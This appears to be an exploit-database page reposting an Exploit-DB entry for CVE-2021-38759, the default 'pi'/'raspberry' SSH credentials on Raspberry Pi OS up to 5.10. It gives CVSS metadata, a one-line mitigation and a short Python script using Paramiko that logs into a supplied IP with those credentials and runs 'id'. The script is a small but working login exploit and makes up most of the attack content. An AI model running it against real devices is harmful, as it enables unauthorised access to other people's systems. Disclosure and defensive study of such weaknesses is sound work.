header-logo
Suggest Exploit
vendor:
Raspberry Pi OS
by:
netspooky
9.8
CVSS
CRITICAL
Default Credentials
287
CWE
Product Name: Raspberry Pi OS
Affected Version From: Raspberry Pi OS <= 5.10
Affected Version To: Raspberry Pi OS <= 5.10
Patch Exists: NO
Related CWE: CVE-2021-38759
CPE: o:raspberrypi:raspberry_pi_os
Metasploit:
Other Scripts:
Platforms Tested: Raspberry Pi OS 5.10
2021

Raspberry Pi 5.10 – Default Credentials

This exploit is used to gain access to a Raspberry Pi OS &lt;= 5.10 device using the default credentials (username: pi, password: raspberry). The exploit is written in Python and uses the Paramiko library to connect to the device and execute the 'id' command.

Mitigation:

Change the default credentials of the device.
Source

Exploit-DB raw data:

# Exploit Title: Raspberry Pi 5.10 - Default Credentials
# Date: 08/12/2021
# Exploit Author: netspooky
# Vendor Homepage: https://www.raspberrypi.com/
# Software Link: https://www.raspberrypi.com/software/operating-systems/
# Version: Raspberry Pi OS <= 5.10
# Tested on: Raspberry Pi OS 5.10
# CVE : CVE-2021-38759

# Initial Release: https://twitter.com/netspooky/status/1468603668266209280

# Run: $ python3 exploit.py IP

import paramiko

import sys

h=sys.argv[1]

u="pi"

p="raspberry"

c=paramiko.client.SSHClient()

c.set_missing_host_key_policy(paramiko.AutoAddPolicy())

c.connect(h,username=u,password=p)

i,o,e=c.exec_command("id")

print(o.read())

c.close()

Navigation

Suggest Exploit

Services By CQR